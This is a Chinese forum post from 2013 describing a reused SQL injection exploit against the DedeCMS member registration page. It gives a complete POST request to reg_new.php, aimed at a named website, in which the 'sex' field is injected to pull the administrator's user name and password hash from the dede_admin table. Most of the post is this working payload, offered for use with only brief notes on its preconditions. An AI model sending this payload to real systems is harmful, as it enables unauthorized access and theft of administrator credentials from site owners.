找回密码
 立即注册
查看: 2681|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞
' `0 i$ E4 \$ Q2 K  |/ C$ K* }简要描述:/ v) o# C! |8 `+ M2 D2 O7 g. N# A. [

0 ~5 v5 x6 g1 V$ H" ~5 P0 @) C! ^/ k需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.9 _7 `. ?' D( b2 o9 T1 E! A
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.7 Q9 z2 J; d. ?
详细说明:跟这个漏洞% }2 M5 Z( a8 X

# w, u7 M! v8 U2 }/ P" bWooYun: Dedecms SQL注射导致审核机制绕过漏洞, \7 @4 `# @2 T. X
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的./ f1 q+ G/ s$ o+ M
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
, [! T3 a% D% {% l $ P& m' B7 R& Q1 h& Q
www.political-security.com/member/reg_new.php8 c; Z9 t- O* t3 l: c( D8 M
' O2 _1 t5 h( i: R# b- H! N
POST1 c, a' W6 q  B2 I# x, W: p; S1 _
! I* M: \9 H% Z0 H8 F. \
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
- Q# n  z: {' O. ]userid=c4rp3nt3r&uname=c4rp3nt3r* Z* U2 J3 b& N, w' L5 t$ q6 H2 F
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss2 _5 b1 B' p8 J+ I" m0 Z
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,( O8 y  F' K3 h  _1 Q6 x
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');( U  _- F: ?& s: Z5 K! b7 `8 n
%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表